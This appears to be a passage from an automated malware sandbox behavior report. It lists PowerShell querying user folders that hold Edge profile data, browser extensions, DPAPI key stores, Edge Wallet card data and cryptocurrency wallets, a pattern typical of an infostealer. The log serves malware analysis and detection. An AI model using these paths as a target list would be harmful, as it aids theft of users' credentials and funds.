Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\Headlights VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\LogTransport2 VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Protect VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-2246122658-3693405117-2476756634-1003 VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Roaming\Zephyr VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Roaming\Zephyr\wallets VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ca VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\da VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_US VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\et VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\eu VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fil VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fr_CA VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\gl VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hi VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hr VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hu VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hy VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\id VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\is VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\it VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\iw VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ja VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ka VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\kk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\km VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ko VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lt VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lv VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ml VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\mn VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ne VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\nl VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pa VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pl VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pt_BR VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pt_PT VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ro VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ru VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\si VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sl VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sr VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sv VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sw VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ta VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\te VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\th VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\tr VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\uk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ur VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\vi VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zh_HK VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zh_TW VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_metadata VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.0_0 VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\JumpListIconsRecentWorkspacesV2 VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Segmentation Platform VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Segmentation Platform\SegmentInfoDB VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Segmentation Platform\SignalDB VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Segmentation Platform\SignalStorageConfigDB VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index-dir VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\a72670a9-643e-4e4e-b4d5-e6019a48f42a VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\optimization_guide_hint_cache_store VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\optimization_guide_model_metadata_store VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\EADPData Component VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\EADPData Component\4.0.2.33 VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Designer VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Designer\1.0.0.20 VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5959.0 VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Travel VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Travel\1.0.0.2 VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19 VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Mini-Wallet VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Notification VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Tokenized-Card VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Wallet-Checkout VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\ar VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\en-GB VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\fr-CA VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\id VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\pt-BR VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\ru VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\zh-Hant VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\ar VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\en-GB VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\ja VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\en-GB VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\es VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\fr VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\it VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\sv VolumeInformationJump to behavior
